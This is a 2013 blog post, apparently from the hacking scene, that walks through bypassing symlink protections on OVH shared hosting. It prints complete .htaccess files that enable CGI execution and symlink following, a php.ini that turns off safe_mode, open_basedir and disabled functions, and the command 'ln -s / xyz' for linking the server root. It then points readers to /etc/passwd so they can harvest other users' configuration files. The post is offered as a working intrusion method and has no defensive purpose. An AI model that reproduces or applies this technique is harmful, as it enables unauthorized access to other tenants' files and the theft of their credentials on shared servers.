Saturday, March 30, 2013


Hello everybody , today i'm going to explain how to bypass symlink in ovh server, well most of hackers find problem in ovh when trying to symlink the server ! this method  was  found by Mauritania Attacker and it's still private , but i decided it to publish it in public.

First you gonna create a dir call it what you want example "abc" then create a '.htaccess" file in the folder "abc" 

CODE:

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .lnx

AddHandler cgi-script .lnx
AddHandler cgi-script .lnx


Secondly  we gonna create a second folder we call it example "xyz" we also make an ".htaccess" file

CODE:

#Developped by Mauritania Attacker
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes

AddType text/plain .php
AddHandler server-parsed .php

AddType root .root
AddHandler cgi-script .root
AddHandler cgi-script .root


Then we create also in the folder "xyz" a file called "php.ini"

CODE:

safe_mode = Off
disable_functions =
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On

so here we come to the last  part !

we gonna retrieve the configs by typing the following command :

ln -s / xyz

Here we go we have succesfully retrieved the root path , so now to find the configs , we can upload a perl file in "xyz" and paste the users of the server "etc/passwd"
and the rest is very basic.


0 comments :

Post a Comment